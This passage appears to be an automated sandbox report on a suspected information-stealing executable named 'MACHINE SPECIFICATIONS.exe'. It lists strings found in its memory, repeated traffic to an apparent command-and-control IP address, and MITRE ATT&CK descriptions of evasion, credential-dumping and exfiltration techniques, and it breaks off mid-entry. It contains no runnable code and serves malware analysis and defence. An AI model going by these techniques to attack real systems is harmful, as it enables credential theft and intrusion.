Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://service.r
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://support.a
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364530309.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364530309.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364788039.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364788039.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/t_
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.adob
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://helpx.ad
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
